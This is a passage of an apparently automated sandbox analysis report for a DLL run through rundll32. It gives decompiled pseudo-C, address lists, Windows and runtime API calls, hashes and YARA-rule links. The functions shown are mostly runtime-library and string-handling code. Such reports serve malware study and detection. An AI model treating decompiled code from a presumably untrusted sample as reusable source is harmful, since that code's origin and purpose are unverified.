					__eflags = _t11 - 0xffffffff;
					if(_t11 == 0xffffffff) {
						L5:
						_t11 = 0;
					} else {
						__eflags = _t11;
						if(__eflags == 0) {
							_t4 = E6E77B23B(_t14, __eflags,  *0x6e78c020, 0xffffffff);
							__eflags = _t4;
							if(_t4 != 0) {
								_push(0x28);
								_t27 = E6E77D272();
								_t18 = 1;
								__eflags = _t27;
								if(__eflags == 0) {
									L8:
									_t11 = 0;
									E6E77B23B(_t18, __eflags,  *0x6e78c020, 0);
								} else {
									_t8 = E6E77B23B(_t18, __eflags,  *0x6e78c020, _t27);
									_pop(_t18);
									__eflags = _t8;
									if(__eflags != 0) {
										_t11 = _t27;
										_t27 = 0;
										__eflags = 0;
									} else {
										goto L8;
									}
								}
								E6E77D1F2(_t27);
							} else {
								goto L5;
							}
						}
					}
					SetLastError(_t24);
					return _t11;
				} else {
					return 0;
				}
			}












                                                      0x6e779fc9
                                                      0x6e779fd0
                                                      0x6e779fe3
                                                      0x6e779fea
                                                      0x6e779fec
                                                      0x6e779fed
                                                      0x6e779ff0
                                                      0x6e77a009
                                                      0x6e77a009
                                                      0x6e779ff2
                                                      0x6e779ff2
                                                      0x6e779ff4
                                                      0x6e779ffe
                                                      0x6e77a005
                                                      0x6e77a007
                                                      0x6e77a00e
                                                      0x6e77a017
                                                      0x6e77a01a
                                                      0x6e77a01b
                                                      0x6e77a01d
                                                      0x6e77a031
                                                      0x6e77a031
                                                      0x6e77a03a
                                                      0x6e77a01f
                                                      0x6e77a026
                                                      0x6e77a02c
                                                      0x6e77a02d
                                                      0x6e77a02f
                                                      0x6e77a043
                                                      0x6e77a045
                                                      0x6e77a045
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77a02f
                                                      0x6e77a048
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x6e77a007
                                                      0x6e779ff4
                                                      0x6e77a050
                                                      0x6e77a05a
                                                      0x6e779fd2
                                                      0x6e779fd4
                                                      0x6e779fd4

                                                      APIs
                                                      • GetLastError.KERNEL32(00000001,?,6E779BD3,6E7789F5,6E778C86,?,6E778EBE,?,00000001,?,?,00000001,?,6E78A4D0,0000000C,6E778FB7), ref: 6E779FD7
                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E779FE5
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E779FFE
                                                      • SetLastError.KERNEL32(00000000,6E778EBE,?,00000001,?,?,00000001,?,6E78A4D0,0000000C,6E778FB7,?,00000001,?), ref: 6E77A050
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256174394.000000006E771000.00000020.00020000.sdmp, Offset: 6E770000, based on PE: true
                                                      • Associated: 00000004.00000002.2256114280.000000006E770000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256274221.000000006E785000.00000002.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256320369.000000006E78C000.00000004.00020000.sdmp Download File
                                                      • Associated: 00000004.00000002.2256368048.000000006E78E000.00000002.00020000.sdmp Download File
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e770000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastValue___vcrt_
                                                      • String ID:
                                                      • API String ID: 3852720340-0
                                                      • Opcode ID: 2a18d3375e721c3a636435127835b73b06b434351f47e3efa769e17246685c3f
                                                      • Instruction ID: bc2c10c84f1e7e17d87e295a820139d2acf97a5f5665589915f11520bd56d928
                                                      • Opcode Fuzzy Hash: 2a18d3375e721c3a636435127835b73b06b434351f47e3efa769e17246685c3f
                                                      • Instruction Fuzzy Hash: 4501B13350AB126EBE7509F5BE8868B276DEB17AB97300739F120450F8FF2198019951
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7D88B8, Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(?,?,6E7D84CB,6E7D3ECC,6E7D41FB), ref: 6E7D88C6
                                                      • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6E7D88D4
                                                      • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6E7D88ED
                                                      • SetLastError.KERNEL32(00000000,?,6E7D84CB,6E7D3ECC,6E7D41FB), ref: 6E7D893F
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ErrorLastValue___vcrt_
                                                      • String ID:
                                                      • API String ID: 3852720340-0
                                                      • Opcode ID: 6caebb34c3965b1d2a44057e45f4b59afa7d25c2bc4724e0ed36da768721631b
                                                      • Instruction ID: 471efa902c8eff912e7febabdeaa8cf4d2ef63e9a235bc5884adcd4271ef5730
                                                      • Opcode Fuzzy Hash: 6caebb34c3965b1d2a44057e45f4b59afa7d25c2bc4724e0ed36da768721631b
                                                      • Instruction Fuzzy Hash: 5101FC32119B17AEB7551EF59F98A8A2BA9EB237787201239E128405F4EF524809D6C0
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7C2E0A, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 6E7C2E11
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6E7C2E1B
                                                      • moneypunct.LIBCPMT ref: 6E7C2E55
                                                      • std::_Facet_Register.LIBCPMT ref: 6E7C2E6C
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6E7C2E8C
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 6E7C2EAA
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Exception@8Facet_H_prolog3Lockit::_Lockit::~_RegisterThrowmoneypunct
                                                      • String ID:
                                                      • API String ID: 3107890152-0
                                                      • Opcode ID: c9bfd461e543017fa19a1eeadc66682ad3783dbeff774eb53edd680075deebce
                                                      • Instruction ID: 4e95ab5931842dfe3c182c5aca972dd40840549b3177e131f301202814a695ec
                                                      • Opcode Fuzzy Hash: c9bfd461e543017fa19a1eeadc66682ad3783dbeff774eb53edd680075deebce
                                                      • Instruction Fuzzy Hash: 24119E7280065A9BCF01DFE4DA58AEE77BDAF85714F140819D414BB2B0DF74AA098B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7C2EB0, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 6E7C2EB7
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6E7C2EC1
                                                      • moneypunct.LIBCPMT ref: 6E7C2EFB
                                                      • std::_Facet_Register.LIBCPMT ref: 6E7C2F12
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6E7C2F32
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 6E7C2F50
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Exception@8Facet_H_prolog3Lockit::_Lockit::~_RegisterThrowmoneypunct
                                                      • String ID:
                                                      • API String ID: 3107890152-0
                                                      • Opcode ID: 9d1bd117f0658ddc0c2ad1be86e6b0ba07167abbab20763e1c94db5b59e14b4b
                                                      • Instruction ID: 980645addb337c2f07161924687e15e2d826b728796be365287d23a5b466e3ba
                                                      • Opcode Fuzzy Hash: 9d1bd117f0658ddc0c2ad1be86e6b0ba07167abbab20763e1c94db5b59e14b4b
                                                      • Instruction Fuzzy Hash: 5811A03180065A9FCF05DFE4DA58AEE77BDAF85714F100919E414AB2B0DF749A09CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7CFF25, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 6E7CFF2C
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6E7CFF36
                                                      • messages.LIBCPMT ref: 6E7CFF70
                                                      • std::_Facet_Register.LIBCPMT ref: 6E7CFF87
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6E7CFFA7
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 6E7CFFC5
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Exception@8Facet_H_prolog3Lockit::_Lockit::~_RegisterThrowmessages
                                                      • String ID:
                                                      • API String ID: 735504661-0
                                                      • Opcode ID: 9f84fa0e3fa156dff50f66e39a4e9f36bdbc1a6822fbffa5a72edbeda849184a
                                                      • Instruction ID: 5980002c9e58a551c01211f38ea42110baeb7e871c2fe475097ca1488dc69092
                                                      • Opcode Fuzzy Hash: 9f84fa0e3fa156dff50f66e39a4e9f36bdbc1a6822fbffa5a72edbeda849184a
                                                      • Instruction Fuzzy Hash: 70119171900219DBCF05DFE4CA58AED77BDEF85724F100819E414AB2B0DF74AA09CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7C2CBE, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 6E7C2CC5
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6E7C2CCF
                                                      • moneypunct.LIBCPMT ref: 6E7C2D09
                                                      • std::_Facet_Register.LIBCPMT ref: 6E7C2D20
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6E7C2D40
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 6E7C2D5E
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Exception@8Facet_H_prolog3Lockit::_Lockit::~_RegisterThrowmoneypunct
                                                      • String ID:
                                                      • API String ID: 3107890152-0
                                                      • Opcode ID: 8c646aefc4fc62b9982677a96a2f1f3bf33b0a89769671ac81ac8e49adad2d61
                                                      • Instruction ID: dcec9e08e3f5ffec6f5657810ee01a85e317c9043fcbee7f776872761ca5d476
                                                      • Opcode Fuzzy Hash: 8c646aefc4fc62b9982677a96a2f1f3bf33b0a89769671ac81ac8e49adad2d61
                                                      • Instruction Fuzzy Hash: 14118C75800619CBCF01DFE4CA58AED77BDAF95728F100818D815AB2B0DB74AA098B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7C2D64, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 6E7C2D6B
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6E7C2D75
                                                      • moneypunct.LIBCPMT ref: 6E7C2DAF
                                                      • std::_Facet_Register.LIBCPMT ref: 6E7C2DC6
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6E7C2DE6
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 6E7C2E04
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Exception@8Facet_H_prolog3Lockit::_Lockit::~_RegisterThrowmoneypunct
                                                      • String ID:
                                                      • API String ID: 3107890152-0
                                                      • Opcode ID: 8840f3ab6406fbe7a6102f92744484c6eb18881c55a792ce3506b1dd21f38817
                                                      • Instruction ID: b9f44dcac21f660b58d77ce474b227b4167ac7342723e0afb1f3619ce6e26a8a
                                                      • Opcode Fuzzy Hash: 8840f3ab6406fbe7a6102f92744484c6eb18881c55a792ce3506b1dd21f38817
                                                      • Instruction Fuzzy Hash: ED119E31800659DBCF45DFE4CA58AFD77BDAF85728F540818D414AB2B0DF74AA098B91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7C2834, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Exception@8Facet_H_prolog3Lockit::_Lockit::~_RegisterThrowctype
                                                      • String ID:
                                                      • API String ID: 3682835225-0
                                                      • Opcode ID: fec209815987f3c9eafae1468c3f1c7b1e513689d92e2b1d4777e4fdaf2b1d00
                                                      • Instruction ID: 612120ff5ffe9359609f0362878a0daad505a6649c9456bd99de6bcfd5fd6561
                                                      • Opcode Fuzzy Hash: fec209815987f3c9eafae1468c3f1c7b1e513689d92e2b1d4777e4fdaf2b1d00
                                                      • Instruction Fuzzy Hash: 7A11A0318006199FCF01DFE4CA58AEE77BDAF85724F140819E914AB2B0DF749A09CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7C28DA, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 6E7C28E1
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6E7C28EB
                                                      • messages.LIBCPMT ref: 6E7C2925
                                                      • std::_Facet_Register.LIBCPMT ref: 6E7C293C
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6E7C295C
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 6E7C297A
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Exception@8Facet_H_prolog3Lockit::_Lockit::~_RegisterThrowmessages
                                                      • String ID:
                                                      • API String ID: 735504661-0
                                                      • Opcode ID: 9d1e7139acde69264547400c036f21432b8f466533fe3b2f2da2235b5da88565
                                                      • Instruction ID: 055a6a544656116ed36d37d964b656b95e285d3a4d02adcd915eb9601e9b809b
                                                      • Opcode Fuzzy Hash: 9d1e7139acde69264547400c036f21432b8f466533fe3b2f2da2235b5da88565
                                                      • Instruction Fuzzy Hash: 77118C7190061A8FCF05DFE4CA58AFE77BDAF85714F140C19E414BB2B0DB74AA098B92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7C2980, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 6E7C2987
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6E7C2991
                                                      • messages.LIBCPMT ref: 6E7C29CB
                                                      • std::_Facet_Register.LIBCPMT ref: 6E7C29E2
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6E7C2A02
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 6E7C2A20
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Exception@8Facet_H_prolog3Lockit::_Lockit::~_RegisterThrowmessages
                                                      • String ID:
                                                      • API String ID: 735504661-0
                                                      • Opcode ID: 336132afc94c0536d213dd1fc49bb9349c09b9c17d5401405d4beb63662e0d54
                                                      • Instruction ID: 8039777e0152c45d25268d56ad4ea3a23625a47588094a7543c4b79ed8cc3a60
                                                      • Opcode Fuzzy Hash: 336132afc94c0536d213dd1fc49bb9349c09b9c17d5401405d4beb63662e0d54
                                                      • Instruction Fuzzy Hash: 03119E329006199BCF01DFE4CA58AEE77BDAF85714F140C18D415BB2B0DF74AA09DB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7C2642, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Exception@8Facet_H_prolog3Lockit::_Lockit::~_RegisterThrowcollate
                                                      • String ID:
                                                      • API String ID: 391686620-0
                                                      • Opcode ID: 60e3ceccebe6bf3cfc7887fd3cf68affe078906fc4b8eb75df5a7b58d7e5001c
                                                      • Instruction ID: 26bc41b6ee43aef3e58dc1b06a79efb071e2ec8388f34311270d5f0d574487ed
                                                      • Opcode Fuzzy Hash: 60e3ceccebe6bf3cfc7887fd3cf68affe078906fc4b8eb75df5a7b58d7e5001c
                                                      • Instruction Fuzzy Hash: 181191318006199FCF01DFE4CA58AFD77BDAF85718F100818D815BB2B0DF74AA098BA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7C26E8, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Exception@8Facet_H_prolog3Lockit::_Lockit::~_RegisterThrowcollate
                                                      • String ID:
                                                      • API String ID: 391686620-0
                                                      • Opcode ID: 43c88cc572e6041c744dd97e098484500bf62b5fbe34df1a619a08de481ad558
                                                      • Instruction ID: 07ca4ff33338aebb6de6c8c5d537c97a7ad2c761b8d880f25c33d8accf1d0411
                                                      • Opcode Fuzzy Hash: 43c88cc572e6041c744dd97e098484500bf62b5fbe34df1a619a08de481ad558
                                                      • Instruction Fuzzy Hash: B811A3319006198FCF01DFE4DA98AFD77BDAF85714F140819D514AB2B0DF749A05CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7C278E, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Exception@8Facet_H_prolog3Lockit::_Lockit::~_RegisterThrowctype
                                                      • String ID:
                                                      • API String ID: 3682835225-0
                                                      • Opcode ID: 5ebdde99e8289426bd0ec5fe5550978e8066ed217996c6e221ea74045d286211
                                                      • Instruction ID: 048c0142f0713a8643230bcf008c9e76a0d6555f1e38433d1b471d236cc6d18b
                                                      • Opcode Fuzzy Hash: 5ebdde99e8289426bd0ec5fe5550978e8066ed217996c6e221ea74045d286211
                                                      • Instruction Fuzzy Hash: 8011A035900619DFCF01DFE4CA58AED77BDAF85718F100819D514AB2B0DF74AA09DB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7C24F6, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Exception@8Facet_H_prolog3Lockit::_Lockit::~_RegisterThrowcodecvt
                                                      • String ID:
                                                      • API String ID: 19020681-0
                                                      • Opcode ID: 1f2d07004eb4b8301a7a99d4e2a5ce64cfd0a7a69b621c3d760fbb2c5a8e61ef
                                                      • Instruction ID: 3afa9dc34f793298ff644bed9eb11b7dd6c634d36f3e5bb36824d470111839db
                                                      • Opcode Fuzzy Hash: 1f2d07004eb4b8301a7a99d4e2a5ce64cfd0a7a69b621c3d760fbb2c5a8e61ef
                                                      • Instruction Fuzzy Hash: 1811A371800619DFCF01DFE4DA68AEE77BDAF85728F500818D8146B2B0EF74AA05DB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7C259C, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Exception@8Facet_H_prolog3Lockit::_Lockit::~_RegisterThrowcodecvt
                                                      • String ID:
                                                      • API String ID: 19020681-0
                                                      • Opcode ID: 17ce24ba5f4404006759ed3a7acd989898148407765dc7a318c24a37b2d4dac8
                                                      • Instruction ID: 0ebebed19a356caf8bbb6981f7b57762c79d6e7f2f1a4261870cbb0174b181e6
                                                      • Opcode Fuzzy Hash: 17ce24ba5f4404006759ed3a7acd989898148407765dc7a318c24a37b2d4dac8
                                                      • Instruction Fuzzy Hash: FD11E3319006599FCF01DFE4CA58AEE77BCAF84714F100809D410BB2B0DF34AA09CB92
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7C3295, Relevance: 9.1, APIs: 6, Instructions: 54COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • __EH_prolog3.LIBCMT ref: 6E7C329C
                                                      • std::_Lockit::_Lockit.LIBCPMT ref: 6E7C32A6
                                                      • numpunct.LIBCPMT ref: 6E7C32E0
                                                      • std::_Facet_Register.LIBCPMT ref: 6E7C32F7
                                                      • std::_Lockit::~_Lockit.LIBCPMT ref: 6E7C3317
                                                      • __CxxThrowException@8.LIBVCRUNTIME ref: 6E7C3335
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: std::_$Lockit$Exception@8Facet_H_prolog3Lockit::_Lockit::~_RegisterThrownumpunct
                                                      • String ID:
                                                      • API String ID: 2758779489-0
                                                      • Opcode ID: 8e388cd7922157cb6e82511437ee0fb41071f2424e30cc7e66af75241b3f3d28
                                                      • Instruction ID: 6aa06cefa323e6a1f8e51c7630d0ebb0a868a81654bdacd6fd515f27848ae8db
                                                      • Opcode Fuzzy Hash: 8e388cd7922157cb6e82511437ee0fb41071f2424e30cc7e66af75241b3f3d28
                                                      • Instruction Fuzzy Hash: 6A11E3718002199FCF01DFE4DA58AFDB7BCAF84724F140808D4116B2B0DF34AA05CB91
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E7F7D21, Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                      Download Yara Rule
                                                      APIs
                                                      • GetLastError.KERNEL32(00000008,6E849A90,6E80076C), ref: 6E7F7D25
                                                      • _free.LIBCMT ref: 6E7F7D58
                                                      • _free.LIBCMT ref: 6E7F7D80
                                                      • SetLastError.KERNEL32(00000000,6E849A00,6E849A90), ref: 6E7F7D8D
                                                      • SetLastError.KERNEL32(00000000,6E849A00,6E849A90), ref: 6E7F7D99
                                                      • _abort.LIBCMT ref: 6E7F7D9F
                                                      Memory Dump Source
                                                      • Source File: 00000004.00000002.2256424769.000000006E791000.00000020.00020000.sdmp, Offset: 6E791000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_4_2_6e791000_rundll32.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$_free$_abort
                                                      • String ID:
                                                      • API String ID: 3160817290-0
                                                      • Opcode ID: b18aabdc6acd581f6b1ecc4c38c125b86821aac4828b8d55eca552d5980fc001
                                                      • Instruction ID: bc28eec27f1765059f370692a8a61458f4859d1c8f9aa21bdf45d4f95c7d89ad
                                                      • Opcode Fuzzy Hash: b18aabdc6acd581f6b1ecc4c38c125b86821aac4828b8d55eca552d5980fc001
                                                      • Instruction Fuzzy Hash: 62F0F935564B01EAC6025BE99E0DA9F153E9FD2675B610A24F818963F4EF2485038564
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 6E778228, Relevance: 8.9, APIs: 7, Instructions: 147memorystringCOMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 84%
                                                      			E6E778228(void* __ecx, CHAR* __edx, CHAR* _a4) {
				signed int _v8;
				signed int _v12;
				int _v16;
				intOrPtr _v20;
				CHAR* _v24;
				char* _v28;
				void* _v32;
				char* _v36;
				int _t69;
				char* _t70;
				char* _t72;
				char* _t80;
				long _t83;
				char* _t85;
				intOrPtr _t104;
				char** _t105;
				char* _t107;
				void* _t109;
				char* _t118;
				char* _t121;
				char* _t122;
				char* _t123;
				char* _t124;
				char* _t125;
				intOrPtr _t128;
				char* _t130;
				char* _t131;
				void* _t132;

				_v12 = _v12 & 0x00000000;
				_t105 = __ecx;
				_t121 = __edx;
				_v32 = __ecx;
				_v24 = __edx;
				_v16 = lstrlenA(__edx);
				_t69 = lstrlenA(_a4);
				_v8 = _t69;
				_t128 = _t69 - _v16;
				_v20 = _t128;
				_t70 = StrStrA( *_t105, _t121);
				if(_t128 > 0) {
					while(1) {
						L10:
						_t122 = _t70;
						while(_t122 != 0) {
							_t118 = _t105[2];
							_t72 =  &(_t105[1][_t128]);
							_t109 =  *_t105;
							_v36 = _t72;
							_v32 = _t109;
							if(_t118 >= _t72) {
								_t130 =  &(_t122[_v8]);
								E6E77B400(_t130,  &(_t122[_v16]), _t109 - _t122 - _v16 + _t105[1]);
								E6E77B400(_t122, _a4, _v8);
								_t80 = _v36;
								_t132 = _t132 + 0x18;
								_push(_v24);
								 *((char*)(_v32 + _t80)) = 0;
								_push(_t130);
								goto L9;
							} else {
								_t83 = _t118 + _v8 * 2 + _t128;
								_v36 = _t83;
								_t85 = HeapReAlloc(GetProcessHeap(), 0, _t109, _t83);
								_v28 = _t85;
								if(_t85 != 0) {
									 *_t105 = _t85;
									_t123 =  &(_t122[_t85 - _v32]);
									_v32 = _t123;
									_t124 =  &(_t123[_v8]);
									E6E77B400(_t124, _v32 + _v16, _t105[1] - _v32 - _v16 + _v28);
									E6E77B400(_v32, _a4, _v8);
									_t132 = _t132 + 0x18;
									_t80 = _v20 + _t105[1];
									_t105[2] = _v36;
									_push(_v24);
									_push(_t124);
									_t80[_v28] = 0;
									L9:
									_t105[1] = _t80;
									_t70 = StrStrA(??, ??);
									_t128 = _v20;
									_v12 = _v12 + 1;
									goto L10;
								}
							}
						}
						goto L12;
					}
				} else {
					while(1) {
						_v28 = _t70;
						if(_t70 == 0) {
							break;
						}
						E6E77B400(_t70, _a4, _v8);
						_t125 =  *_t105;
						_t131 = _t105[1];
						_t107 =  &(_v28[_v8]);
						E6E77B400(_t107,  &(_v28[_v16]), _t125 - _v28 - _v16 + _t131);
						_t132 = _t132 + 0x18;
						_t104 = _v20 + _t131;
						 *((intOrPtr*)(_v32 + 4)) = _t104;
						 *((char*)(_t104 + _t125)) = 0;
						_t70 = StrStrA(_t107, _v24);
						_v12 = _v12 + 1;
						_t105 = _v32;
					}
				}
				L12:
				return _v12;
			}































                                                      0x6e77822e
                                                      0x6e77823a
                                                      0x6e77823d
                                                      0x6e77823f
                                                      0x6e778243
                                                      0x6e77824b
                                                      0x6e77824e
                                                      0x6e778252
                                                      0x6e778255
                                                      0x6e77825b
                                                      0x6e77825e
                                                      0x6e778266
                                                      0x6e7783a0
                                                      0x6e7783a0
                                                      0x6e7783a0
                                                      0x6e7783a2
                                                      0x6e7782ce
                                                      0x6e7782d1
                                                      0x6e7782d3
                                                      0x6e7782d5
                                                      0x6e7782d8
                                                      0x6e7782dd
                                                      0x6e778364
                                                      0x6e77836f
                                                      0x6e77837b
                                                      0x6e778380
                                                      0x6e778383
                                                      0x6e778389
                                                      0x6e77838c
                                                      0x6e778390
                                                      0x00000000
                                                      0x6e7782df
                                                      0x6e7782e5
